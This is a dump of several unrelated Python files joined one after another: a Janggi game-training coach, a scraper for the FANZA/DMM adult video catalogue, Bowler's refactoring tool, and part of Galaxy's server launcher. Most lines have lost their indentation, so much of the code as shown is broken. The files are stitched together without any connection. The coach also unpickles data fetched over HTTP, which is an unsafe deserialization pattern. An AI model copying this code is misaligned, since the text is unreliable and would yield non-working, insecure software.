log.info('TRAINING AND SAVING NEW MODEL')
self.nnet.train(trainExamples)
# Save checkpoints every iteration
self.nnet.save_checkpoint(folder=self.args.checkpoint_folder, filename=self.getCheckpointFile(self.selfPlaysPlayed))
log.info('ACQUIRING LOCK FOR MOUNTED FOLDER ACCESS')
can_access = pickle.loads(requests.get(url = self.args.request_base_url+"/acquireLock").content)
while (not can_access):
sleep(10)
can_access = pickle.loads(requests.get(url = self.args.request_base_url+"/acquireLock").content)
log.info('SAVING CHECKPOINT')
with open(JanggiCoach.getSharedStateDictFile(self.args.checkpoint_folder), 'wb') as handle:
pickle.dump({k: v.cpu() for k, v in self.nnet.nnet.state_dict().items()}, handle)
requests.get(url = self.args.request_base_url+"/releaseLock")
# Send evaluation request
requests.post(url = self.args.request_base_url+"/pushEval", data = pickle.dumps((False, self.selfPlaysPlayed)))
# Send the new state_dict
requests.post(url = self.args.request_base_url+"/updateSD", data = pickle.dumps(self.selfPlaysPlayed))
log.info('Alerted updated network')
def getCheckpointFile(self, iteration):
return 'checkpoint_' + str(iteration) + '.pickle'
@staticmethod
    def getStateDictFile(folder, iteration):
return os.path.join(folder, 'sd_' + str(iteration) + '.pickle')
@staticmethod
def getSharedStateDictFile(folder):
return os.path.join(folder, 'sd_shared.pickle')
def saveTrainExamples(self, iteration):
folder = self.args.checkpoint_folder
if not os.path.exists(folder):
os.makedirs(folder)
filename = os.path.join(folder, self.getCheckpointFile(iteration) + ".examples")
with open(filename, "wb+") as f:
Pickler(f).dump(self.trainExamplesHistory)
f.closed
def loadTrainExamples(self):
modelFile = os.path.join(self.args.load_folder_file[0], self.args.load_folder_file[1])
examplesFile = modelFile + ".examples"
if not os.path.isfile(examplesFile):
log.warning(f'File "{examplesFile}" with trainExamples not found!')
r = input("Continue? [y|n]")
if r != "y":
sys.exit()
else:
log.info("File with trainExamples found. Loading it...")
with open(examplesFile, "rb") as f:
self.trainExamplesHistory = Unpickler(f).load()
log.info('Loading done!')
# examples based on the model were already collected (loaded)
self.skipFirstSelfPlay = True
|
dmm.py
|
# -*- coding: utf-8 -*-
import re, os
import threading
import time
from jinja2 import PackageLoader,Environment
from bs4 import BeautifulSoup
from queue import Queue
#from lxml import etree
from app.utils.requests import get_html_jp,get_html_jp_html
from app.utils.loadini import read_config
from selenium import webdriver
def findinfo(articleid):
url = "https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id=%s/" %articleid
html = get_html_jp(url)
page1 = re.findall(r'/digital/videoa/-/list/=/article=actress/id=\d+/page=(\d+)/',html)
    title = re.findall(r'<title>(.*) - エロ動画・アダルトビデオ - FANZA動画</title>',html)
if page1 == []:
page1 = 1
else:
page3 = []
for i in page1:
if i not in page3:
page3.append(int(i))
page4 = max(page3)
page1 = page4
title1 = title[0]
return (page1,title1)
def producer(in_q,articleid, page):
url1 = "https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id={}/".format(articleid)
in_q.put(url1)
for i in range(2, int(page)+1):
url = "https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id={}/page={}/".format(articleid,i)
#print(url)
in_q.put(url)
def dmmcid(in_q, out_q):
while in_q.empty() is not True:
url = in_q.get()
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/=/article=actress/id=1060823/'
html = get_html_jp(url)
list = re.findall(r'https://www.dmm.co.jp/digital/videoa/-/detail/=/cid=([_0-9a-z]+)/',html)
#print(list)
out_q.append(list)
in_q.task_done()
def dmm_thread(articleid):
start = time.time()
page, title = findinfo(articleid)
#print(page,title)
queue = Queue()
result_queue = []
#page = 9
producer_thread = threading.Thread(target=producer, args=(queue, articleid, page))
#producer_thread.daemon = True
producer_thread.start()
for index in range(int(page)+1):
consumer_thread = threading.Thread(target=dmmcid, args=(queue, result_queue))
consumer_thread.daemon = True
consumer_thread.start()
        #print('threads started: ' + str(threading.active_count()))
queue.join()
resetlist = []
for i in result_queue:
try:
for n in i:
if n not in resetlist:
resetlist.append(n)
except TypeError:
if i not in resetlist:
resetlist.append(i)
#print(resetlist)
leng = len(resetlist)
alllist = ','.join(resetlist)
end = time.time()
usetime = str(end - start)
    result = '%s - エロ動画・アダルトビデオ - FANZA動画\npage(%s)(%s),cid list =>\n%s' % (title,page,leng,alllist)
return (result,usetime)
def ciddata(html):
notitle = 0
soup = BeautifulSoup(html,'lxml')
try:
        ifresult = re.findall(r'(指定されたページが見つかりません)', html)
        noresult = '指定されたページが見つかりません'
except:
pass
try:
if noresult in ifresult:
notitle = 1
return (noresult, notitle)
except Exception:
pass
ciddata = {}
allper = soup.find_all(name='span', id='performer')
sortper = re.findall(r'<a href=\"/digital/videoa/-/list/=/article=actress/id=(\d+)/\".*>(.*)</a>', str(allper))
perfordata = {}
for i in sortper:
perfordata[i[0]] = i[1]
if perfordata != None:
ciddata['performers'] = perfordata
else:
ciddata['performers'] = '---'
allkey = soup.find('table', attrs = {'class':'mg-b20'}).find_all('a', href = re.compile('article=keyword'))
sortkey = re.findall(r'<a href="/digital/videoa/-/list/=/article=keyword/id=(\d+)/".*>(.*?)</a>', str(allkey))
keyworddata = {}
for i in sortkey:
keyworddata[i[0]] = i[1]
if perfordata != None:
ciddata['keyword'] = keyworddata
else:
ciddata['keyword'] = '---'
scoregif = soup.find('table', attrs = {'class':'mg-b20'}).find_all('img')
try:
score = re.findall(r'https://.*/(\d)_?(\d)?.gif',str(scoregif))[0]
ciddata['score'] = score
except:
ciddata['score'] = '0-0'
try:
redkey = re.findall(r'<span class="red">(.*)</span>',html)[0]
titlebig = re.findall(r'<title>(.*)</title>',html)[0]
ciddata['title'] = redkey + ' ' + titlebig
except:
ciddata['title'] = '---'
notitle = 1
try:
ciddata['fanart_img'] = re.findall(r'<a href=\"(.*)\" target=\"_package\" name=\"package-image\"',html)[0]
except:
ciddata['fanart_img'] = '---'
try:
        ciddata['distribute'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">配信開始日：</td>\n?<td>\n?(.*)</td>',html)[0]
except:
ciddata['distribute'] = '---'
try:
        ciddata['release'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">商品発売日：</td>\n?<td>\n?(.*)</td>',html)[0]
except:
ciddata['release'] = '---'
try:
        ciddata['time'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">収録時間：</td>\n?<td>(.*\n?.*)',html)[0]
except:
ciddata['time'] = '---'
try:
        ciddata['directorid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">監督：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=director/id=(\d+)/\".*>.*</a></td>',html)[0]
except:
ciddata['directorid'] = '---'
try:
        ciddata['director'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">監督：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=director/id=\d+/\".*>(.*)</a></td>',html)[0]
except:
ciddata['director'] = '---'
try:
        ciddata['series'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">シリーズ：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=series/id=\d+/\".*>(.*)</a></td>',html)[0]
except:
ciddata['series'] = '---'
try:
        ciddata['seriesid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">シリーズ：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=series/id=(\d+)/\".*>.*</a></td>',html)[0]
except:
ciddata['seriesid'] = '---'
try:
        ciddata['maker'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">メーカー：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=maker/id=\d+/\">(.*)</a></td>',html)[0]
except:
ciddata['maker'] = '---'
try:
        ciddata['makerid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">メーカー：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=maker/id=(\d+)/\">.*</a></td>',html)[0]
except:
ciddata['makerid'] = '---'
try:
        ciddata['label'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">レーベル：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=label/id=\d+/\">(.*)</a></td>',html)[0]
except:
ciddata['label'] = '---'
try:
        ciddata['labelid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">レーベル：</td>\n?<td><a href=\"/digital/videoa/-/list/=/article=label/id=(\d+)/\">.*</a></td>',html)[0]
except:
ciddata['labelid'] = '---'
try:
        ciddata['cid'] = re.findall(r'<td align=\"right\" valign=\"top\" class=\"nw\">品番：</td>[\s\S]*?<td>(.*?)</td>',html)[0]
except:
ciddata['cid'] = '---'
return (ciddata,notitle)
def prevideo(searchcid):
video1 = searchcid[0]
video3 = searchcid[0:3]
videobase = 'https://cc3001.dmm.co.jp/litevideo/freepv/{}/{}/{}/{}_dmb_w.mp4'.format(video1,video3,searchcid,searchcid)
return videobase
def prevideolow(searchcid):
video1 = searchcid[0]
video3 = searchcid[0:3]
videobase = 'https://cc3001.dmm.co.jp/litevideo/freepv/{}/{}/{}/{}_sm_w.mp4'.format(video1,video3,searchcid,searchcid)
return videobase
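# Worked example of the two helpers above (URL shape read from the code, not verified
# against the live site): prevideo('ssni00441') returns
#   https://cc3001.dmm.co.jp/litevideo/freepv/s/ssn/ssni00441/ssni00441_dmb_w.mp4
# and prevideolow() swaps the _dmb_w suffix for the lower-bitrate _sm_w variant.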
def prephotos(searchcid):
searchurl = 'https://www.dmm.co.jp/digital/videoa/-/detail/=/cid={}/'.format(searchcid)
html = get_html_jp(searchurl)
soup = BeautifulSoup(html,'lxml')
photourlss = soup.find_all('img', attrs = {'class':'mg-b6'})
photourls = re.findall(r'(https://pics.dmm.co.jp/digital/video/.*?/.*?.jpg)', str(photourlss))
photolist = list(photourls)
#print(photolist)
jpg = []
for i in photolist:
ii = list(i)
ii.insert(-6,'jp')
iii = ''.join(ii)
iii = iii.replace('-jp','jp-',1)
jpg.append(iii)
return (jpg)
def template_cid(ciddataa):
ciddataa_performers = ciddataa.get('performers')
ciddataa_keyword = ciddataa.get('keyword')
#print(ciddataa_performers)
    env = Environment(loader=PackageLoader(__name__,"templates"))  # create a package loader object
    template = env.get_template('cid.md')  # fetch the template file
    temp_out = template.render(ciddata = ciddataa, ciddata_performers = ciddataa_performers, ciddata_keyword = ciddataa_keyword)
    #print(temp_out)  # render
return (temp_out)
#print(Substitute)
def dmmonecid(searchcid):
searchcid = searchcid.replace('-','00')
searchurl = 'https://www.dmm.co.jp/digital/videoa/-/detail/=/cid={}/'.format(searchcid)
html = get_html_jp(searchurl)
ciddataa,notitle = ciddata(html)
    if ciddataa == '指定されたページが見つかりません':
return ciddataa,notitle
temp_out = template_cid(ciddataa)
return temp_out, notitle
def dmmsearch_data(searchstr):
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr=ไน็ฝใใใ'
url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr={}'.format(searchstr)
html = get_html_jp(url)
    # check whether the search returned any results
try:
        result = re.findall(r'(選択した条件で商品は存在しませんでした)',html)
        noresult = '選択した条件で商品は存在しませんでした'
except:
pass
try:
if noresult in result:
stitle = 1
return (noresult,stitle)
except Exception:
pass
soup = BeautifulSoup(html,'lxml')
searchbody = soup.find('div',attrs = {'class' : 'd-area'})
try:
stitle = re.findall(r'<title>(.*?)</title>',html)[0]
except Exception:
        stitle = '検索結果'
boxall = searchbody.find_all('li',attrs = {'style' : 'width: 130px;'})
onebox = str(boxall).split('</div></li>')
boxlist = []
for box in onebox:
boxdict = {}
notitle = 0
if box:
try:
litetitle = re.findall(r'<span class=\"txt\">(.*?)</span>',box)[0]
#print(litetitle)
if litetitle == None:
notitle = 1
except:
notitle = 1
try:
cid = re.findall(r'https://www\.dmm\.co\.jp/.*?/cid=(\w+)/',box)[0]
boxdict['cid'] = cid
except Exception as e:
boxdict['cid'] = '-'
try:
keywords = re.findall(r'<span class=\"ico-st-\w+\"><span>(.*?)</span></span>',box)
keyword = ','.join(keywords)
boxdict['keyword'] = keyword
except:
boxdict['keyword'] = '-'
try:
links = re.findall(r'(https://www\.dmm\.co\.jp/.*?/cid=\w+/)',box)[0]
boxdict['links'] = links
except:
boxdict['links'] = '-'
try:
img = re.findall(r'<span class=\"img\"><img alt=\".*?\" src=\"(https://pics.dmm.co.jp/digital/video/\w+/\w+.jpg)\"/></span>',box)
boxdict['img'] = img[0]
except:
boxdict['img'] = '-'
try:
title = re.findall(r'<span class=\"img\"><img alt=\"(.*?)\" src=\"https://pics.dmm.co.jp/digital/video/\w+/\w+.jpg\"/></span>',box)
boxdict['title'] = title[0]
except:
boxdict['title'] = '-'
try:
sublinks = re.findall(r'span><a href=\"(.*?)\">.*?</a></span>',box)
sublink = 'https://www.dmm.co.jp' + sublinks[0]
boxdict['sublinks'] = sublink
except:
boxdict['sublinks'] = '-'
try:
subtexts = re.findall(r'<span><a href=\".*?\">(.*?)</a></span>',box)
boxdict['subtexts'] = subtexts[0]
except:
boxdict['subtexts'] = '-'
if notitle == 0:
#print(boxdict)
boxlist.append(boxdict)
return (boxlist,stitle)
def template_search(resultdataa,stitlee):
    env = Environment(loader=PackageLoader(__name__,"templates"))  # create a package loader object
    template = env.get_template('search.md')  # fetch the template file
    temp_out = template.render(resultdata = resultdataa,stitle = stitlee)
    #print(temp_out)  # render
return (temp_out)
def dmmsearch(searchstr,mode='temp'):
result, stitle = dmmsearch_data(searchstr)
if mode == 'onlysearch':
return result, stitle
    noresult = '選択した条件で商品は存在しませんでした'
if result == noresult:
return noresult
temp_out = template_search(result, stitle)
return temp_out
def dmmlinks_data(links):
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr=ไน็ฝใใใ'
url = links
html = get_html_jp(url)
    # check whether the page returned any results
soup = BeautifulSoup(html,'lxml')
searchbody = soup.find('div',attrs = {'class' : 'd-area'})
try:
stitle = re.findall(r'<title>(.*?)</title>',html)[0]
#print(stitle)
except Exception:
        stitle = '検索結果'
boxall = searchbody.find_all('li',attrs = {'style' : 'width: 130px;'})
onebox = str(boxall).split('</div></li>')
boxlist = []
for box in onebox:
boxdict = {}
notitle = 0
if box:
try:
litetitle = re.findall(r'<span class=\"txt\">(.*?)</span>', box)[0]
# print(litetitle)
if litetitle == None:
notitle = 1
except:
notitle = 1
try:
cid = re.findall(r'https://www\.dmm\.co\.jp/.*?/cid=(\w+)/', box)[0]
boxdict['cid'] = cid
except Exception as e:
boxdict['cid'] = '-'
try:
keywords = re.findall(r'<span class=\"ico-\w+-\w+\"><span>(.*?)</span></span>', box)
keyword = ','.join(keywords)
boxdict['keyword'] = keyword
except:
boxdict['keyword'] = '-'
try:
links = re.findall(r'(https://www\.dmm\.co\.jp/.*?/cid=\w+/)', box)[0]
boxdict['links'] = links
except:
boxdict['links'] = '-'
try:
img = re.findall(r'(pics\.dmm\.co\.jp/.*?/\w+/\w+.jpg)',box)
boxdict['img'] = img[0]
except:
boxdict['img'] = '-'
try:
title = re.findall(
r'alt=\"(.*)\" src',
box)
boxdict['title'] = title[0]
except:
boxdict['title'] = '-'
try:
sublinks = re.findall(r'span><a href=\"(.*?)\">.*?</a></span>', box)
sublink = 'https://www.dmm.co.jp' + sublinks[0]
boxdict['sublinks'] = sublink
except:
boxdict['sublinks'] = '-'
try:
subtexts = re.findall(r'<span><a href=\".*?\">(.*?)</a></span>', box)
boxdict['subtexts'] = subtexts[0]
except:
boxdict['subtexts'] = '-'
if notitle == 0:
#print(boxdict)
boxlist.append(boxdict)
return (boxlist,stitle)
def template_links(resultdataa,stitlee):
    env = Environment(loader=PackageLoader(__name__,"templates"))  # create a package loader object
    template = env.get_template('search.md')  # fetch the template file
    temp_out = template.render(resultdata = resultdataa,stitle = stitlee)
    #print(temp_out)  # render
return (temp_out)
def dmmlinks(links):
result, stitle = dmmlinks_data(links)
#print(result, stitle)
temp_out = template_links(result, stitle)
return temp_out
def truevideo(searchcid):
url = 'https://www.dmm.co.jp/digital/videoa/-/detail/ajax-movie/=/cid={}'.format(searchcid)
#coding=utf-8
allconfig = read_config()
ifproxy = allconfig['ifproxy']
proxy = allconfig['proxy']
system = allconfig['system']
    # browser settings
    options = webdriver.ChromeOptions()
    # Chrome headless mode
    options.add_argument('--headless')
    options.add_argument('--disable-gpu')
    options.add_argument('--no-sandbox')
    options.add_argument('--disable-software-rasterizer')
    # set the language
    options.add_argument('lang=ja_JP.UTF-8')
    # set the user-agent header
    options.add_argument('user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36"')
    # set the proxy
if ifproxy == 'true':
options.add_argument('proxy-server=' + proxy)
if system == 'Linux':
browser = webdriver.Chrome(executable_path=os.path.abspath(os.path.join("app", "bin","chromedriver")),options=options)
elif system == 'Windows':
browser = webdriver.Chrome(executable_path=os.path.abspath(os.path.join("app", "bin","chromedriver.exe")),options=options)
#browser.set_page_load_timeout(5)
browser.get(url)
#print(browser.page_source)
browser.switch_to.default_content()
browser.switch_to.frame('DMMSample_player_now')
video = browser.find_element_by_xpath('//*[contains(@id,"video-video")]')
    # return the URL of the playable video file
videourl = browser.execute_script("return arguments[0].currentSrc;",video)
browser.quit()
return videourl
def dmmsearchall_data(searchstr):
#url = 'https://www.dmm.co.jp/digital/videoa/-/list/search/=/?searchstr=ไน็ฝใใใ'
url = 'https://www.dmm.co.jp/search/=/searchstr={}/sort=rankprofile/'.format(searchstr)
html = get_html_jp(url)
    # check whether the search returned any results
    result = re.findall(r'(に一致する商品は見つかりませんでした。)',html)
    noresult = 'に一致する商品は見つかりませんでした。'
try:
if noresult in result:
stitle = 1
return (noresult,stitle)
except Exception:
pass
soup = BeautifulSoup(html,'lxml')
searchbody = soup.find('div',attrs = {'class' : 'd-area'})
try:
stitle = re.findall(r'<title>(.*?)</title>',html)[0]
except Exception:
        stitle = '検索結果'
boxall = searchbody.find('div',attrs = {'class' : 'd-sect'})
onebox = str(boxall).split('<div>')
boxlist = []
for box in onebox:
boxdict = {}
notitle = 0
if box:
try:
litetitle = re.findall(r'<span class=\"txt\">(.*?)</span>',box)[0]
#print(litetitle)
if litetitle == None:
notitle = 1
except:
notitle = 1
try:
cid = re.findall(r'<a href=\"https://www\.dmm\.co\.jp/.*?/cid=(\w+)/\?.*?\">',box)[0]
boxdict['cid'] = cid
except:
boxdict['cid'] = '-'
try:
keywords = re.findall(r'<span class=\"ico-\w+-\w+\"><span>(.*?)</span></span>',box)
keyword = ','.join(keywords)
boxdict['keyword'] = keyword
except:
boxdict['keyword'] = '-'
try:
links = re.findall(r'<a href=\"(https://www\.dmm\.co\.jp/.*?-/detail/=/cid=\w+/\?.*?)\">',box)[0]
boxdict['links'] = links
except:
boxdict['links'] = '-'
try:
img = re.findall(r'(pics\.dmm\.co\.jp/.*?/\w+/\w+.jpg)',box)[0]
boxdict['img'] = img
except Exception as e:
boxdict['img'] = '-'
try:
title = re.findall(r'alt=\"(.*)\" src',box)[0]
boxdict['title'] = title
except Exception as e:
boxdict['title'] = '-'
try:
sublinks = re.findall(r'<span><a href=\"(.*?)\">.*?</a></span>',box)
boxdict['sublinks'] = sublinks[0]
except Exception as e:
boxdict['sublinks'] = '-'
try:
subtexts = re.findall(r'<span><a href=\".*?\">(.*?)</a></span>',box)[0]
boxdict['subtexts'] = subtexts
except:
boxdict['subtexts'] = '-'
if notitle == 0:
#print(boxdict)
boxlist.append(boxdict)
return (boxlist,stitle)
def template_searchall(resultdataa,stitlee):
    env = Environment(loader=PackageLoader(__name__,"templates"))  # create a package loader object
    template = env.get_template('searchall.md')  # fetch the template file
    temp_out = template.render(resultdata = resultdataa,stitle = stitlee)
    #print(temp_out)  # render
return (temp_out)
def dmmsearchall(searchstr,mode='temp'):
result, stitle = dmmsearchall_data(searchstr)
if mode == 'onlysearch':
return result, stitle
    noresult = 'に一致する商品は見つかりませんでした。'
if result == noresult:
return noresult
temp_out = template_searchall(result, stitle)
return temp_out
if __name__ == "__main__":
print(dmmonecid('ssni-441'))
|
tool.py
|
#!/usr/bin/env python3
#
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import difflib
import logging
import multiprocessing
import os
import time
from queue import Empty
from typing import Iterator, List, Sequence, Tuple
import click
import sh
from fissix.pgen2.parse import ParseError
from fissix.refactor import RefactoringTool
from .types import (
BowlerException,
BowlerQuit,
Filename,
Fixers,
Hunk,
Processor,
RetryFile,
)
PROMPT_HELP = {
"y": "apply this hunk",
"n": "skip this hunk",
"a": "apply this hunk and all remaining hunks for this file",
"d": "skip this hunk and all remaining hunks for this file",
"q": "quit; do not apply this hunk or any remaining hunks",
"?": "show help",
}
log = logging.getLogger(__name__)
def diff_texts(a: str, b: str, filename: str) -> Iterator[str]:
lines_a = a.splitlines()
lines_b = b.splitlines()
return difflib.unified_diff(lines_a, lines_b, filename, filename, lineterm="")
def prompt_user(question: str, options: str, default: str = "") -> str:
options = options.lower()
default = default.lower()
assert len(default) < 2 and default in options
if "?" not in options:
options += "?"
prompt_options = ",".join(o.upper() if o == default else o for o in options)
prompt = f"{question} [{prompt_options}]? "
result = ""
while True:
result = input(prompt).strip().lower()
if result == "?":
for option in PROMPT_HELP:
click.secho(f"{option} - {PROMPT_HELP[option]}", fg="red", bold=True)
elif len(result) == 1 and result in options:
return result
elif result:
click.echo(f'invalid response "{result}"')
elif default:
return default
class BowlerTool(RefactoringTool):
NUM_PROCESSES = os.cpu_count() or 1
def __init__(
self,
fixers: Fixers,
*args,
interactive: bool = True,
write: bool = False,
silent: bool = False,
hunk_processor: Processor = None,
**kwargs,
) -> None:
options = kwargs.pop("options", {})
options["print_function"] = True
super().__init__(fixers, *args, options=options, **kwargs)
self.queue_count = 0
self.queue = multiprocessing.JoinableQueue() # type: ignore
self.results = multiprocessing.Queue() # type: ignore
self.semaphore = multiprocessing.Semaphore(self.NUM_PROCESSES)
self.interactive = interactive
self.write = write
self.silent = silent
if hunk_processor is not None:
self.hunk_processor = hunk_processor
else:
self.hunk_processor = lambda f, h: True
def get_fixers(self) -> Tuple[Fixers, Fixers]:
fixers = [f(self.options, self.fixer_log) for f in self.fixers]
pre: Fixers = [f for f in fixers if f.order == "pre"]
post: Fixers = [f for f in fixers if f.order == "post"]
return pre, post
def processed_file(
self, new_text: str, filename: str, old_text: str = "", *args, **kwargs
) -> List[Hunk]:
self.files.append(filename)
hunks: List[Hunk] = []
if old_text != new_text:
a, b, *lines = list(diff_texts(old_text, new_text, filename))
hunk: Hunk = []
for line in lines:
if line.startswith("@@"):
if hunk:
hunks.append([a, b, *hunk])
hunk = []
hunk.append(line)
if hunk:
hunks.append([a, b, *hunk])
return hunks
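    # Shape of the hunks built above (a reading of the code, not a documented contract):
    # diff_texts() yields a unified diff whose first two lines are the "--- <file>" and
    # "+++ <file>" headers; processed_file() re-attaches those headers to every "@@" section,
    # so each Hunk looks like ["--- foo.py", "+++ foo.py", "@@ -1,4 +1,4 @@", "-old", "+new", ...].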
def refactor_file(self, filename: str, *a, **k) -> List[Hunk]:
try:
hunks: List[Hunk] = []
input, encoding = self._read_python_source(filename)
if input is None:
# Reading the file failed.
return hunks
except OSError:
self.log_debug("Failed to read %s, skipping", filename)
return hunks
try:
if not input.endswith("\n"):
input += "\n"
tree = self.refactor_string(input, filename)
hunks = self.processed_file(str(tree), filename, input)
except ParseError:
self.log_debug("Failed to parse %s, skipping", filename)
return hunks
def refactor_dir(self, dir_name: str, *a, **k) -> None:
"""Descends down a directory and refactor every Python file found.
Python files are assumed to have a .py extension.
Files and subdirectories starting with '.' are skipped.
"""
py_ext = os.extsep + "py"
for dirpath, dirnames, filenames in os.walk(dir_name):
self.log_debug("Descending into %s", dirpath)
dirnames.sort()
filenames.sort()
for name in filenames:
if not name.startswith(".") and os.path.splitext(name)[1] == py_ext:
fullname = os.path.join(dirpath, name)
self.queue_work(Filename(fullname))
# Modify dirnames in-place to remove subdirs with leading dots
dirnames[:] = [dn for dn in dirnames if not dn.startswith(".")]
def refactor_queue(self) -> None:
self.semaphore.acquire()
while True:
filename = self.queue.get()
if filename is None:
break
try:
hunks = self.refactor_file(filename)
self.results.put((filename, hunks))
except RetryFile:
self.log_debug(f"Retrying {filename} later...")
self.queue.put(filename)
except BowlerException as e:
self.log_debug(f"Bowler exception during transform: {e}")
self.results.put((filename, []))
finally:
self.queue.task_done()
self.semaphore.release()
def queue_work(self, filename: Filename) -> None:
self.queue.put(filename)
self.queue_count += 1
def refactor(self, items: Sequence[str], *a, **k) -> None:
"""Refactor a list of files and directories."""
child_count = max(1, min(self.NUM_PROCESSES, len(items)))
self.log_debug(f"starting {child_count} processes")
children = [
multiprocessing.Process(target=self.refactor_queue)
for i in range(child_count)
]
for child in children:
child.start()
for dir_or_file in sorted(items):
if os.path.isdir(dir_or_file):
self.refactor_dir(dir_or_file)
else:
self.queue_work(Filename(dir_or_file))
for _child in children:
self.queue.put(None)
results_count = 0
while True:
try:
filename, hunks = self.results.get_nowait()
self.log_debug(f"results: got {len(hunks)} hunks for {filename}")
results_count += 1
self.process_hunks(filename, hunks)
except Empty:
if self.queue.empty() and results_count == self.queue_count:
break
elif not any(child.is_alive() for child in children):
self.log_debug(f"child processes stopped without consuming work")
break
else:
time.sleep(0.05)
except BowlerQuit:
for child in children:
child.terminate()
return
self.log_debug(f"all children stopped and all diff hunks processed")
def process_hunks(self, filename: Filename, hunks: List[Hunk]) -> None:
auto_yes = False
result = ""
accepted_hunks = ""
for hunk in hunks:
if self.hunk_processor(filename, hunk) is False:
continue
if not self.silent:
for line in hunk:
if line.startswith("---"):
click.secho(line, fg="red", bold=True)
elif line.startswith("+++"):
click.secho(line, fg="green", bold=True)
elif line.startswith("-"):
click.secho(line, fg="red")
elif line.startswith("+"):
click.secho(line, fg="green")
else:
click.echo(line)
if self.interactive:
if auto_yes:
click.echo(f"Applying remaining hunks to {filename}")
result = "y"
else:
result = prompt_user("Apply this hunk", "ynqad", "n")
self.log_debug(f"result = {result}")
if result == "q":
self.apply_hunks(accepted_hunks, filename)
raise BowlerQuit()
elif result == "d":
self.apply_hunks(accepted_hunks, filename)
return # skip all remaining hunks
elif result == "n":
continue
elif result == "a":
auto_yes = True
result = "y"
elif result != "y":
raise ValueError("unknown response")
if result == "y" or self.write:
accepted_hunks += "\n".join(hunk[2:]) + "\n"
self.apply_hunks(accepted_hunks, filename)
def apply_hunks(self, accepted_hunks, filename):
if accepted_hunks:
accepted_hunks = f"--- {filename}\n+++ {filename}\n{accepted_hunks}"
args = ["patch", "-u", filename]
self.log_debug(f"running {args}")
try:
sh.patch(*args[1:], _in=accepted_hunks.encode("utf-8")) # type: ignore
except sh.ErrorReturnCode as e:
if e.stderr:
err = e.stderr.strip().decode("utf-8")
else:
err = e.stdout.strip().decode("utf-8")
if "saving rejects to file" in err:
err = err.split("saving rejects to file")[1]
log.exception(f"hunks failed to apply, rejects saved to{err}")
return
log.exception(f"failed to apply patch hunk: {err}")
def run(self, paths: Sequence[str]) -> int:
if not self.errors:
self.refactor(paths)
self.summarize()
return int(bool(self.errors))
|
serve.py
|
# Most of this code is:
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
# The server command includes the additional header:
# For discussion of daemonizing:
# http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/278731
# Code taken also from QP:
# http://www.mems-exchange.org/software/qp/
# From lib/site.py
# Galaxy originally used PasteScript and PasteDeploy for application
# loading, to maintain compatibility we've internalized some of that
# code here, stripping out unneeded functionality.
# All top level imports from each package moved here and organized
from __future__ import absolute_import
from __future__ import print_function
import atexit
import errno
import grp
import logging
import optparse
import os
import pwd
import re
import resource
import signal
import socket
import subprocess
import sys
import textwrap
import threading
import time
from logging.config import fileConfig
from six.moves import configparser
from .loadwsgi import loadapp, loadserver
difflib = None
# ---- from paste.script.bool_optparse --------------------------------
"""
A subclass of ``optparse.OptionParser`` that allows boolean long
options (like ``--verbose``) to also take arguments (like
``--verbose=true``). Arguments *must* use ``=``.
"""
try:
_ = optparse._
except AttributeError:
from gettext import gettext as _
class BoolOptionParser(optparse.OptionParser):
def _process_long_opt(self, rargs, values):
arg = rargs.pop(0)
# Value explicitly attached to arg? Pretend it's the next
# argument.
if "=" in arg:
(opt, next_arg) = arg.split("=", 1)
rargs.insert(0, next_arg)
had_explicit_value = True
else:
opt = arg
had_explicit_value = False
opt = self._match_long_opt(opt)
option = self._long_opt[opt]
if option.takes_value():
nargs = option.nargs
if len(rargs) < nargs:
if nargs == 1:
self.error(_("%s option requires an argument") % opt)
else:
self.error(_("%s option requires %d arguments")
% (opt, nargs))
elif nargs == 1:
value = rargs.pop(0)
else:
value = tuple(rargs[0:nargs])
del rargs[0:nargs]
elif had_explicit_value:
value = rargs[0].lower().strip()
del rargs[0:1]
if value in ('true', 'yes', 'on', '1', 'y', 't'):
value = None
elif value in ('false', 'no', 'off', '0', 'n', 'f'):
# Don't process
return
else:
self.error(_('%s option takes a boolean value only (true/false)') % opt)
else:
value = None
option.process(opt, value, values, self)
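# Illustrative behaviour of BoolOptionParser (example option assumed): for a count-style
# option such as --verbose, both "--verbose" and "--verbose=true" increment the counter,
# "--verbose=false" is silently dropped, and anything else (e.g. "--verbose=maybe") raises
# "option takes a boolean value only (true/false)".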
# ---- from paste.script.command --------------------------------------
# (c) 2005 Ian Bicking and contributors; written for Paste (http://pythonpaste.org)
# Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
class BadCommand(Exception):
def __init__(self, message, exit_code=2):
self.message = message
self.exit_code = exit_code
Exception.__init__(self, message)
def _get_message(self):
"""Getter for 'message'; needed only to override deprecation
in BaseException."""
return self.__message
